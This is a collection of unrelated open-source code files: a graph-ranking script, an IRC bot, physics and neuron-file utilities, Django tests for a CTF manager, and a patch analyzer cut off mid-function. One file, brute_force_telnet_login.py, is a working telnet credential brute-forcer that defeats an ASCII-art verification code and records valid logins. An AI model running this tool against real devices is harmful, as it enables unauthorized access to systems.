ryanbressler/GraphSpectrometer | plotpredDecomp.py | 1 | 3795 | """
plotjsondecomp.py
Script to make plots from json files calculated by fiedler.py for random forest
predictor files.
usage:
python plotjsondecomp.py fiedler.out.json
or often:
ls *.json | xargs --max-procs=10 -I FILE python plotjsondecomp.py FILE
THis script also updates the json file to include two additional fields: the value of the grad
component of the hodge decomposition and the rank produced by it:
The best visualization of a random forest predictor is given by r1 and hodge.
{"f1": the first fiedler vector,
"f2": (if caclulated) the second fideler vector
"d": the node degrees,
"r1": the rank of each node in the first fiedler vector
"r2": the rank of each node in the second fiedler vector
"iByn": the index of the nodes by the string used to represent them in
the input file
"nByi": the string used to represent nodes in the input file by their
index in the graph
"adj": the adjascancy list,
["hodge": the values of the gradient from hodge decomposition,
"hodgerank": the hodge rank]}
"""
import os
import sys
import json
import numpy
from numpy import asarray, eye, outer, inner, dot, vstack
from numpy.random import seed, rand
from numpy.linalg import norm
from scipy.sparse.linalg import cg, lsqr
import scipy.sparse
from pydec import d, delta, simplicial_complex, abstract_simplicial_complex
import fiedler
def plotjson(fn):
"""
plotjson: make plots from json output of fiedler.py
fn: the filename of the json file
"""
fo=open(fn)
data=json.load(fo)
fo.close()
if "adj" in data:
(A,adj,Npts) = fiedler.adj_mat(data["adj"])
#A = (A.T - A)/2
A=A.tocoo()
pos=A.data!=0
skew = numpy.column_stack((A.row[pos],A.col[pos],A.data[pos])).tolist()
# method from ranking driver.py
asc = abstract_simplicial_complex([numpy.column_stack((A.row[pos],A.col[pos])).tolist()])
B1 = asc.chain_complex()[1] # boundary matrix
rank = lsqr(B1.T, A.data[pos])[0] # solve least squares problem
# sc = simplicial_complex(([[el] for el in range(0,A.shape[0])],numpy.column_stack((A.row[pos],A.col[pos])).tolist()))
# omega = sc.get_cochain(1)
# omega.v[:] = A.data[pos]
# p = omega.k
# alpha = sc.get_cochain(p - 1)
#
# alpha.v = rank
# v = A.data[pos]-d(alpha).v
#
# cyclic_adj_list=numpy.column_stack((A.row[pos],A.col[pos],v)).tolist()
# div_adj_list=numpy.column_stack((A.row[pos],A.col[pos],d(alpha).v)).tolist()
data["hodge"]=list(rank)
data["hodgerank"]=list(numpy.argsort(numpy.argsort(rank)))
print "Adding hodge results to %s"%(os.path.abspath(fn))
fo = open(fn,"w")
json.dump(data,fo, indent=2)
fo.close()
# A.data = A.data * .25
# alist=fiedler.adj_list(A)
# fn=fn+".abstract"
# #fiedler.doPlots(numpy.array(data["f1"]),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+".all.v.grad.",widths=[24],heights=[6],vsdeg=False,nByi=data["nByi"],directed=False)
# try:
# print "Ploting ", fn
# fiedler.doPlots(numpy.argsort(numpy.argsort(numpy.array(data["f1"]))),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+"fied.rank.v.hodge",widths=[24],heights=[16],vsdeg=False,nByi=data["nByi"],directed=False,dorank=False)
# except ValueError:
# print "ValueError ploting ", fn
# print "A", A.shape,"A.data",A.data.shape,A.row.shape,A.col.shape,"pos",pos.shape,"B1.T.shape", B1.T.shape, "A.data[pos]", A.data[pos].shape, "rank", rank.shape, "numpy.array(data[\"f1\"])", numpy.array(data["f1"]).shape
# pass
def main():
fn=sys.argv[1]
plotjson(fn)
if __name__ == '__main__':
main() | bsd-3-clause | 6,372,562,606,690,363,000 | 33.825688 | 240 | 0.635046 | false | 3.048193 | false | false | false |
braian87b/BruteForceTelnetPy | brute_force_telnet_login.py | 1 | 6288 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import telnetlib
import sys
import os
import hashlib
cred_file = None
def get_hash_from_string(string):
hasher_engine = hashlib.md5()
hasher_engine.update(string)
return hasher_engine.hexdigest()
def port_scan(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect_ex((host, 23))
if connect == 0:
print "[+]\tPort 23: Open"
s.close()
return True
else:
print "[-]\tPort 23: Closed"
s.close()
return False
def save_last_index(last_index):
with open("last_index.txt", "w+") as f:
f.write(str(last_index))
def read_last_index():
try:
with open("last_index.txt", "r+") as f:
last_index = f.read()
except IOError as e:
last_index = 0
return int(last_index) if last_index else 0
def get_credentials(passwords_file):
last_index = read_last_index()
global cred_file
if not cred_file:
print "Opening...", passwords_file
cred_file = open(passwords_file, 'r')
for i in range(0, last_index):
cred_file.readline()
line = cred_file.readline()
user = ""
if ":" in line:
user_password = line.split(':')
user = user_password[0]
password = user_password[1]
else:
password = line
save_last_index(last_index + 1)
return user, password
def truncate(text, start=None, end=None):
if start:
text = text[text.find(start):]
if end:
text = text[:text.find(end) + len(end)]
return text
def truncate_including(text, start=None, end=None):
if start:
text = text[text.find(start) + len(start):]
if end:
text = text[:text.find(end)]
return text
def digit_ocr_verification_code(digit_text=""):
filename = "digit_" + get_hash_from_string(digit_text) + ".txt"
if os.path.exists(filename):
digit_value = open(filename, 'r').read()
else:
while True:
print "Unknown digit:"
print digit_text
digit_value = raw_input("Please enter digit (will be saved for later usage): ")
if len(digit_value) == 1:
break
with open(filename, 'w+') as f:
f.write(digit_value)
return digit_value
def ocr_verification_code(text=""):
"""
Function allows to read digits from text like
# ====================================================
# * * * * * * * * * * * * * * * *
# * * * * *
# * * * * * * * * * * * * *
# * * * * *
# * * * * *
# * * * * * * * * * * * * *
# ====================================================
"""
digits_spacing = 13
text = text.replace('\r\n', '\n')
text = truncate_including(text, '==\n', '\n==')
digits = [] # we store digits
for line in text.split('\n'): # we read digits line by line
if not digits:
digits = ["" for x in range(len(line) / digits_spacing)]
reading_line = line
line_parts = []
while True:
line_part = reading_line[:digits_spacing]
if line_part:
line_parts.append(reading_line[:digits_spacing].rstrip(' ')) # rstrip
reading_line = reading_line[digits_spacing:]
else:
break
for index, line_part in enumerate(line_parts):
digits[index] = digits[index] + line_part + '\n'
ocr = ""
for digit in digits:
ocr = ocr + digit_ocr_verification_code(digit)
return ocr
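# Note on the two helpers above (added comment, not original code): each digit of
# the banner is a 13-column block of '*' characters. ocr_verification_code() cuts
# the banner into those blocks, and digit_ocr_verification_code() hashes each block
# with MD5, storing the manually entered value in "digit_<md5>.txt" so every
# distinct digit pattern only has to be typed in once.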
def brute_login(host, passwords_file):
tn = None # telnet connection
need_user = False # need's username
while True: # main while, we don't go out until Valid Cred. found
try:
if not tn:
asked_password_in_cnx = False
tn = telnetlib.Telnet(host)
# tn.debuglevel = 10
print "[-]\tPort 23: Connecting..."
while True: # while requesting input
response = tn.read_until(":", 1) # until input request
if "verification code:" in response:
verif_code = ocr_verification_code(response)
print "[+] Entering Verif. Code:\t" + verif_code
tn.write(verif_code + "\n")
elif "Login:" in response:
need_user = True
asked_password_in_cnx = False # Last time asked for password in this connection?
user, password = get_credentials(passwords_file)
print "[+] Trying user:\t" + user
tn.write(user + "\n")
elif "Password:" in response:
if asked_password_in_cnx and need_user:
tn.close() # we should try next pair user/password
break # TODO FIX: allow multiple password from same user
asked_password_in_cnx = True # Last time asked for password in this connection?
if not need_user: # didn't ask for username, we read password
user, password = get_credentials(passwords_file)
if not password:
print "[-] No more Credentials to try"
sys.exit(0)
print "[+] Trying password:\t" + password
tn.write(password + "\n")
if ">" in response:
with open("valid_credentials.txt", "a") as f:
print "[+] Valid Credentials found:\t" + ' : '.join((user, password))
f.write("Valid Credentials found: " + ' : '.join((user, password)) + '\n')
break # Get out from input request while
if ">" in response:
break # Get out from main while
except EOFError as e:
pass # Disconnected, no problem, we will connect again.
if __name__ == "__main__":
if port_scan(sys.argv[1]):
brute_login(sys.argv[1], sys.argv[2])
| mit | -6,661,056,122,699,512,000 | 33.549451 | 101 | 0.499682 | false | 3.964691 | false | false | false |
ruozi/GetSchemeUrl_From_IPA | GetSchemeUrl.py | 1 | 1665 | #!/usr/bin/env python
#
# Scan IPA file and parse its Info.plist and report the SchemeUrl result.
#
# Copyright (c) 2015 by Ruozi,Pinssible. All rights reserved.
import zipfile
import os
import sys
import re
import plistlib
class GetSchemeUrl:
plist_file_rx = re.compile(r'Payload/.+?\.app/Info.plist$')
schemeurl_key_rx = re.compile(r'CFBundleURLSchemes')
def __init__(self,ipa_filename):
        self.ipa_filename = ipa_filename
        self.errors = []
def get_filename_from_ipa(self):
zip_obj = zipfile.ZipFile(self.ipa_filename, 'r')
regx = GetSchemeUrl.plist_file_rx
filenames = zip_obj.namelist()
filename = ''
for fname in filenames:
if regx.search(fname):
filename = fname
break
return {'filename':filename, 'zip_obj': zip_obj}
def extract_scheme_url(self):
        ipa_file = self.get_filename_from_ipa()
plist_filename = ipa_file['filename']
zip_obj = ipa_file['zip_obj']
        urlschemes = []
if plist_filename == '':
self.errors.append('Info.plist file not found in IPA')
else:
content = zip_obj.read(plist_filename)
data = plistlib.readPlistFromString(content)
urltypes = data['CFBundleURLTypes']
urlschemes = urltypes[0]['CFBundleURLSchemes']
return urlschemes
if __name__ == '__main__':
test_file_path = r'/Users/Ruozi/Music/iTunes/iTunes Media/Mobile Applications/SketchBook 3.1.2.ipa'
getter = GetSchemeUrl(test_file_path)
print getter.extract_scheme_url()
sys.exit(0)
| gpl-2.0 | -5,124,134,703,800,660,000 | 27.706897 | 103 | 0.618018 | false | 3.550107 | false | false | false |
Casarella/TRAPPER | TRAPPER.py | 1 | 10626 | #RedTrProb.py
#TRAPPER - TRAnsition Probability Processing/computER
#c. Jan 27, 2017 - Clark Casarella
# Updated to output to a LaTeX friendly table to the output file
# Does not take uncertainty in mixing into account
import math as m
import scipy.constants as sc
import numpy as np
csvpath=input("Enter path to csv file (including file extension): ")
print('Using the input parameters from',str(csvpath)+':')
outpath=input("Enter output path/filename (will be a text file): ")
print('Output placed at:',outpath)
output_file=open(outpath,'w')
#see_weisskopf_units=input("Do you want to see the Weisskopf unit conversion? [Y/N]")
#csvpath='162Dy_GRID.csv'
#csvpath='../162Dy_GRID/162Dy_GRID.csv'
#output_file=open('out.TEST','w')
dtype_full=[('E_g','f8'),('E_g_error','f8'),
('I_g','f8'),('I_g_error','f8'),('I_g_total','f8'),
('delta_mixing','f8'),('delta_upper','f8'),('delta_lower','f8'),
('tau','f8'),('tau_up','f8'),('tau_down','f8'),
('alpha_conv','f8'),('alpha_conv_error','f8'),
('A','int'),('multipolarity','S6'),
('E_level','f8')]
ndtype=str
npnames=['E_g','E_g_error','I_g','I_g_error','I_g_total',
'delta_mixing','delta_upper','delta_lower',
'tau','tau_up','tau_down','alpha_conv','alpha_conv_error',
'A','multipolarity','E_level']
csvfile = np.genfromtxt(csvpath,delimiter=",",skip_header=1,names=npnames,dtype=dtype_full)
#print('array:',csvfile)
#Test single input section
#E_g=0.888157
#I_g=174.8
#I_tot=369.3
#delta=0
#tau=2830*10**-15
#alpha_conv=0.0032
#multipolarity='E2'
#A=162
#E_g=1.31303
#I_g=0.428
#I_tot=1
#delta=0.28
#delta_up=0.34
#tau=320*10**-15
#alpha_conv=0
#multipolarity='E2(M1)'
#A=160
def set_multipolarity():
"""
Returns and extracts the multipolarity of a transition
Decoded from UTF-8 encoding on the string keyed 'multipolarity'
"""
#multipolarity=csvfile[0][14].decode("utf-8")[-1]
if multipolarity[-1]=='1':
return 1
elif multipolarity[-1]=='2':
return 2
else:
#return 2
return 'E2(M1)'
def BwE(A):
"""
Weisskopf estimate for an electric type, multipolarity
l transition, in units of e^2*fm^l
(1 W.u. = XXX e^2fm^l)
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return 0.12**(2*l)/(4*m.pi)*(3/(l+3))**2*A**(2*l/3)
def BwM(A):
"""
Weisskopf estimate for an magnetic type, multipolarity l transition,
in units of mu_N^2
"""
l=set_multipolarity()
if l=='E2(M1)':
l=1
return 0.12**(2*(l-1))*10/m.pi*(3/(l+3))**2*A**(2*(l-1))
def doublefactorial(n):
"""
Double factorial (every other n factorialed)
"""
if n <=0:
return 1
else:
return n*doublefactorial(n-2)
def mult_coefficient():
"""
This coefficient removes angular momentum mixing from the transition
probabilities.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return l*(doublefactorial(2*l+1))**2/(l+1)
#return l*(2*l+1)**2/(l+1)
#print('Coefficient for L:',mult_coefficient())
#print('BwE:',BwE(162))
def mixing_fraction(delta):
"""
Multipole mixing fraction for any mixed-multipolarity transitions
Unitless, and calculates relative E2 strength to M1 B(E2) strength
"""
#delta=csvfile[1][14][5]
l=set_multipolarity()
if l=='E2':
l=2
if delta==0 or l==1:
return 1
elif delta!=0 and l=='E2(M1)':
return delta**2/(1+delta**2)
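# Quick arithmetic check (illustration): for delta = 0.64 the E2 fraction is
# 0.64**2 / (1 + 0.64**2) = 0.4096 / 1.4096 ~= 0.29, i.e. roughly 29% E2 admixture.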
#print(mixing_fraction(0.64))
def BR():
"""
Returns branching ratio (ratio of measured intensity to total intensity leaving the state)
"""
return I_g/I_tot
#print('Mixing Fraction Delta:',mixing_fraction(delta))
#units from scipy - generally helps with precision
m_p=sc.value('proton mass energy equivalent in MeV')
hc=sc.value('Planck constant over 2 pi times c in MeV fm')
hbar=sc.value('Planck constant over 2 pi in eV s')/10**6
barn=10**2
def B_coefficients():
"""
Calculates coefficients for the final B(pl) calculation.
Makes an exception for E1 transitions, traditionally reported in mW.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity=='E1':
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)*1000
else:
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)
def units():
"""
Corrects the units from e^2b^l to W.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity[0]=='E':
return barn**l*sc.alpha*sc.hbar/10**-9*sc.c/sc.e*BwE(A) # check here
elif multipolarity[0]=='M':
return hc*sc.alpha*BwM(A)*(hc/(2*m_p))**2 #check here again
#print('Units from MeVfm to W.u.:',units())
def latex_friendly_units():
"""
Returns LaTeX-friendly units for copying-pasting into LaTeX documents
"""
l=multipolarity
if l=='E1':
return 'mW.u.'
elif l=='E2':
return 'W.u.'
elif l=='M1':
return '$\mu_N^2$'
else:
return 'W.u. (mixed)'
def B(tau):
"""
Calculation of transition probability B(pl) from all inputs necessary
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if l==1:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),3)
else:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),2)
#determine delta_upper bounds on error
def mixing_upper_bounds():
"""
Determines which bound should be used for a particular mixing fraction
- Used in error propagation -
If delta <0, then the most E2 mixing will occur at the most negative number
(delta-delta_lower)
if delta >0, then the most E2 mixing will occur at the most positive number
(delta+delta_upper)
"""
if delta<0:
return delta-delta_lower
elif delta>0:
return delta+delta_upper
else:
return 0
def mixing_lower_bounds():
"""
Performs a similar function to finding the upper bounds on mixing,
Only on the lower bounds
"""
if delta<0:
return delta+delta_upper
elif delta>0:
return delta-delta_lower
else:
return 0
#Error propagation for symmetric quantities:
def dBdE():
#"""
#Uncertainty in B with respect to gamma
#ray energy
#"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/E_g*(2*l+1)*E_g_error)**2,3)
def dBdI():
"""
Uncertainty in B with respect to gamma
ray intensity
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
    return round((B(tau)/I_g*I_g_error)**2,3)
def dBdalpha():
"""
Uncertainty in B with respect to internal
conversion coefficient
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/(1+alpha_conv)*alpha_conv_error)**2,3)
"""
Asymmetric error is calculated via a 'consistent addition
technique' where B is calculated from the 'highest' value
and then subtracting the nominal value, etc
"""
def dBdtau_up():
"""
Calculation of B for the longest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_down),3)
def dBdtau_down():
"""
Calculation of B for the shortest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_up),3)
def uncertainty_tau_upper():
return round((-B(tau)+dBdtau_up())**2,3)
def uncertainty_tau_lower():
return round((B(tau)-dBdtau_down())**2,3)
#def calc_unc_delta_upper():
#"""
#This is an odd section, I need to calculate B under two
#delta conditions, upper and nominal,
#and subtract the two like I did for tau
#"""
#l=set_multipolarity()
#if l=='E2(M1)':
#tempB=B(tau)
#delta=mixing_upper_bounds()
#return -tempB+B(tau)
#else:
#return 0
#Aggregate uncertainty (upper bound)
def upper_uncertainty():
"""
Returns the upper bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_upper())**0.5,3)
#Aggregate uncertainty (lower bound)
def lower_uncertainty():
"""
Returns the lower bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_lower())**0.5,3)
#LaTeX Table header
output_file.write('\\begin{table}[ht]\n')
output_file.write('\\begin{tabular}{l|l|l|l|l|l|l}\n')
header1='E$_{lev}$ (keV) & E$_{\gamma}$ (keV) & I$_{\gamma}$ & ${\\tau}$ (fs)'
header2=' & $\pi\\ell$ & $\delta$ & B($\pi\\ell$) (W.u.) '
#Terminal Outputs - Not LaTeX friendly
output_file.write(header1+header2+'\\\\\hline\hline\n')
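#The structured array 'csvfile' is expected to expose at least the named
#fields read in the loop below: E_g, E_g_error, I_g, I_g_error, I_g_total,
#delta_mixing, delta_upper, delta_lower, tau, tau_up, tau_down, alpha_conv,
#alpha_conv_error, A, multipolarity and E_level.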
for row in list(range(len(csvfile))):
E_g=csvfile[row]['E_g']
E_g_error=csvfile[row]['E_g_error']
I_g=csvfile[row]['I_g']
I_g_error=csvfile[row]['I_g_error']
I_tot=csvfile[row]['I_g_total']
delta=csvfile[row]['delta_mixing']
delta_upper=csvfile[row]['delta_upper']
delta_lower=csvfile[row]['delta_lower']
tau=csvfile[row]['tau']
tau_up=csvfile[row]['tau_up']-tau
tau_down=tau-csvfile[row]['tau_down']
alpha_conv=csvfile[row]['alpha_conv']
alpha_conv_error=csvfile[row]['alpha_conv_error']
A=csvfile[row]['A']
multipolarity=csvfile[row]['multipolarity'].decode("utf-8")
E_lev=csvfile[row]['E_level']
#print('mixing',calc_unc_delta_upper(),tempB)
lineEnergy=str(round(E_lev,2)).ljust(16,' ')+'& '+(str(round(E_g*1000,2))+' ('+str(int(E_g_error*1000))+')').ljust(19,' ')+'& '
lineIntensity=(str(round(I_g,1))+' ('+str(int(I_g_error*10))+')').ljust(13,' ')+'& '+(str(int(tau))+'$^{+'+str(tau_up+tau)+'}_{'+str(tau_down-tau)+'}$').ljust(28,' ')+'& '
lineLifetime=str(multipolarity).ljust(10,' ')+'& '
lineDelta=(str(delta)+' $^{+'+str(delta_upper)+'}_{-'+str(delta_lower)+'}$').ljust(20,' ')+'& '
lineMult=(str(round(B(tau),2))+' $^{+'+str(round(-upper_uncertainty()+B(tau),2))+'}_{'+str(round(B(tau)-lower_uncertainty(),2))+'}$ '+latex_friendly_units()).ljust(30,' ')+'\\\\ \n'
output_file.write(lineEnergy+lineIntensity+lineLifetime+lineDelta+lineMult)
    print('B('+multipolarity+')=',B(tau),'+/-',upper_uncertainty(),latex_friendly_units(),'for the',E_g*1000,'keV transition leaving the',E_lev,'keV state')
output_file.write('\\end{tabular}\n')
output_file.write('\caption{REMEMBER TO CHANGE TABLE CAPTION AND REFERENCE TAG HERE! \label{tab:BE2}}\n')
output_file.write('\\end{table}')
output_file.close()
| gpl-3.0 | 8,386,165,941,889,741,000 | 28.434903 | 185 | 0.621212 | false | 2.8828 | false | false | false |
nathantspencer/webknossos_toolkit | swc_tools/swc_offset.py | 1 | 1563 | import sys
def index_of(line):
return line.split()[0]
def type_of(line):
return line.split()[1]
def x_of(line):
return line.split()[2]
def y_of(line):
return line.split()[3]
def z_of(line):
return line.split()[4]
def radius_of(line):
return line.split()[5]
def parent_of(line):
return line.split()[6]
def offset(swc_path, x_offset, y_offset, z_offset):
f = open(swc_path, 'r')
lines = f.readlines()
lines_to_write = []
f.close()
for line in lines:
        line = line.strip()
new_index = index_of(line) + ' '
new_type = type_of(line) + ' '
new_radius = radius_of(line) + ' '
new_parent = parent_of(line) + '\n'
new_x = str(float(x_of(line)) + x_offset) + ' '
new_y = str(float(y_of(line)) + y_offset) + ' '
new_z = str(float(z_of(line)) + z_offset) + ' '
line_to_write = new_index + new_type + new_x + new_y + new_z + new_radius + new_parent
lines_to_write.append(line_to_write)
f = open(swc_path[:-4] + '_offset.swc', 'w')
for line in lines_to_write:
f.write(line)
f.close()
if __name__ == "__main__":
if len(sys.argv) != 5:
print('\nSWC_OFFSET -- Written by Nathan Spencer 2017')
print('Usage: python swc_offset.py ["path/to/swc/file.swc"] [float x-offset] [float y-offset] [float z-offset]')
else:
swc_file = sys.argv[1]
x_offset = float(sys.argv[2])
y_offset = float(sys.argv[3])
z_offset = float(sys.argv[4])
offset(swc_file, x_offset, y_offset, z_offset)
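# Example invocation (hypothetical path and offsets):
#   python swc_offset.py neuron.swc 10.0 -5.0 2.5
# shifts every node by (10.0, -5.0, 2.5) and writes the result to neuron_offset.swc.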
| mit | 7,372,109,832,491,850,000 | 25.491525 | 120 | 0.557901 | false | 2.756614 | false | false | false |
raizkane/RaizBot | src/main.py | 1 | 2831 | #!/usr/bin/env python
'''
Copyright (C) 2015 Raiz Kane <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
# Importing necessary libraries/modules
import socket
# Functions must be defined here for later execution
server = "irc.oftc.net"
channel = "#botcontrol"
botnick = "RaizBot"
def ping():
ircsock.send("PONG :pingis\n")
def sendmsg(chan, msg):
ircsock.send("PRIVMSG "+ chan +" :"+ msg +"\n")
def joinchan(chan):
ircsock.send("JOIN "+ chan +"\n")
# The whole code goes here
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ircsock.connect((server, 6667))
ircsock.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :This bot is a result of a tutoral covered on http://shellium.org/wiki.\n")
ircsock.send("NICK "+ botnick +"\n")
joinchan(channel)
joinchan("#oftc-hacker")
joinchan("#nottor")
while 1:
ircmsg = ircsock.recv(2048)
ircmsg = ircmsg.strip('\n\r')
print(ircmsg)
if ircmsg.find(":#nottor, contact") != -1:
sendmsg("#nottor", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#nottor", " E9B9 460F 0389 F4AC 713C")
sendmsg("#nottor", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#oftc-hacker, contact") != -1:
sendmsg("#oftc-hacker", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#oftc-hacker", " E9B9 460F 0389 F4AC 713C")
sendmsg("#oftc-hacker", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#nottor, map") != -1:
sendmsg("#nottor", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#oftc-hacker, map") != -1:
sendmsg("#oftc-hacker", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#nottor, awesomepentest") != -1:
sendmsg("#nottor", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#oftc-hacker, awesomepentest") != -1:
sendmsg("#oftc-hacker", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#nottor, who") != -1:
sendmsg("#nottor", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find(":#oftc-hacker, who") != -1:
sendmsg("#oftc-hacker", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find("PING :") != -1:
ping()
| agpl-3.0 | 3,580,462,610,263,847,000 | 31.54023 | 136 | 0.692688 | false | 2.740561 | false | false | false |
BurningNetel/ctf-manager | functional_tests/event/test_creating_event.py | 1 | 6665 | import time
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.utils import timezone, formats
from CTFmanager.models import Event
from functional_tests.base import FunctionalTest
from functional_tests.pages.event.add_event_page import NewEventPage, NewEventPageFields
from functional_tests.pages.event.event_detail_page import EventDetailPage
from functional_tests.pages.event.event_page import EventPage
class NewEventTests(FunctionalTest):
def test_can_create_an_event_from_event_page_and_retrieve_it_later(self):
self.create_and_login_user()
ep = EventPage(self)
# a user goes to the events page
ep.get_page()
# He checks the pages' title is correct
self.assertIn(ep.title, self.browser.title)
self.assertIn(reverse(ep.name), self.browser.current_url)
# the user wants to add a new event,
# so he clicks on the button to add a new event
btn_add_event = ep.get_add_event_button()
self.assertEqual(btn_add_event.get_attribute('text'), 'Add Event')
btn_add_event.click()
nep = NewEventPage(self)
# The browser redirects to a new page
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users fills in all the mandatory data
# The events name
tb_name = nep.get_name_input()
name = 'Hacklu'
tb_name.send_keys(name)
# The date and time that the event starts
datetime = nep.get_date_input()
self.assertEqual(NewEventPageFields.date_ph.value,
datetime.get_attribute('placeholder'))
# The date of the upcoming event is filled in the date textbox
datetime.clear()
_date = timezone.now() + timedelta(days=1)
formatted_date = formats.date_format(_date, "SHORT_DATETIME_FORMAT")
datetime.send_keys(str(_date.year) + '-' +
('0' + str(_date.month))[-2:] + '-' +
('0' + str(_date.day))[-2:] + " " +
str(_date.hour) + ":" +
str(_date.minute)
)
# Then, the user clicks the 'confirm' button
# when every necessary field has been filled in.
btn_confirm = nep.get_confirm_button()
self.assertEqual('btn btn-primary', btn_confirm.get_attribute('class'))
self.assertEqual('Save', btn_confirm.get_attribute('value'))
btn_confirm.click()
# The browser redirects the user to the events page
self.assertIn(reverse(ep.name), self.browser.current_url)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The new event is now visible on the events page
lg_upcoming = ep.get_upcoming_list_group()
rows = lg_upcoming.find_elements_by_tag_name('h4')
self.assertTrue(
any(name in row.text for row in rows)
)
self.assertTrue(
any(formatted_date in row.text for row in rows)
)
# The users wants to view details about the event
# He clicks on the link that is the name of the event to go to the details page
ep.click_on_event_in_upcoming_list_group(name)
self.assertIn('CTFman - ' + name, self.browser.title)
def test_duplicate_event_test(self):
self.create_and_login_user()
# A user wants to create an event for 2015 and for 2016,
# but uses the same name
nep = NewEventPage(self).get_page()
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users creates the first event, it submits correctly.
name = 'CTF' + str(round(time.time()))
date = '2016-01-01 18:00'
nep.submit_basic_event(name, date)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The users adds another event
nep.get_page()
self.assertIn(reverse('newEvent'), self.browser.current_url)
# He uses the same name
date2 = '2015-01-01 18:00'
nep.submit_basic_event(name, date2)
# The form now shows a error
self.assertIn(reverse(nep.name), self.browser.current_url)
self.browser.find_element_by_css_selector('.has-error')
def test_new_event_with_optional_fields_filled(self):
""" This test tests the add_event form, and the event detail page for optional fields
The user is going to add a new event,
He knows a lot about the event, so he is able to fill in all optional fields too
At the end of this test, he check if the optional fields are displayed on the events detail page.
The optional fields are: Description, Location, End_Date, Credentials, URL
(hidden fields): Creation_Date, Created_By
"""
self.create_and_login_user()
# browse to new event page
nep = NewEventPage(self).get_page()
# The user fills in all the field
next_year = (timezone.now() + timedelta(days=365)).year
nep.submit_complete_event('optionalEvent',
'%s-01-01' % next_year,
'test' * 30,
'Eindhoven',
'%s-01-02' % next_year,
'CTF_TEAM_NAME',
'SECURE_PASSWORD',
'hatstack.nl',
10,
1200)
# The user is now at the events overview page.
# He now goes to it's detail page
_event = Event.objects.first()
edp = EventDetailPage(self, _event.name)
edp.get_page()
# He checks if all the information is correct
description = edp.get_description_p()
location = edp.get_location()
url = edp.get_url()
username = edp.get_password()
password = edp.get_username()
# The header contains the events title, date, end date
header = edp.get_header()
edp.toggle_credentials_panel()
# Open the hidden field
time.sleep(1) # Wait for selenium to see the hidden fields.
self.assertIn('test' * 30, description.text)
self.assertIn('Eindhoven', location.text)
self.assertIn('hatstack.nl', url.text)
self.assertIn('CTF_TEAM_NAME', username.text)
self.assertIn('SECURE_PASSWORD', password.text)
self.assertIn('Jan. 1, %s' % next_year, header.text)
self.assertIn(' - ', header.text)
self.assertIn('Jan. 2, %s' % next_year, header.text) | gpl-3.0 | -7,033,169,181,387,475,000 | 40.403727 | 105 | 0.595649 | false | 3.943787 | true | false | false |
alepulver/changesets | patch_analyzer/patch_applicable_version.py | 1 | 2905 | import sys
import os
import patch_utils
from subprocess import Popen, PIPE, call
UTILITY_PATH = "src/main/java/"
PREFIX_BRANCH = "refs/tags/mule-"
def filter_starting_with(l, start):
return filter(lambda path: path.startswith(start), l)
def add_java(c):
return c + ".java"
def git_diff_files(git_source, v_origin, v_destination):
working_dir = os.getcwd()
try:
os.chdir(git_source)
call(["git", "fetch", "--tags"])
p = Popen(["git", "diff", "--name-only", v_origin + ".." + v_destination], stdout=PIPE)
output, _ = p.communicate()
files = [file.decode() for file in output.split(b"\n")]
return set(map(lambda file: file.split(UTILITY_PATH)[-1], filter(lambda file: UTILITY_PATH in file, files)))
finally:
os.chdir(working_dir)
class PatchDiffer:
def __init__(self, mule_ce_path, mule_ee_path):
self.ce = mule_ce_path
self.ee = mule_ee_path
@staticmethod
def conflicts(files, diff_files):
return list(set(files) & diff_files)
def is_applicable(self, changed_classes, origin_version, destination_version):
ce_files = map(add_java, filter_starting_with(changed_classes, "org"))
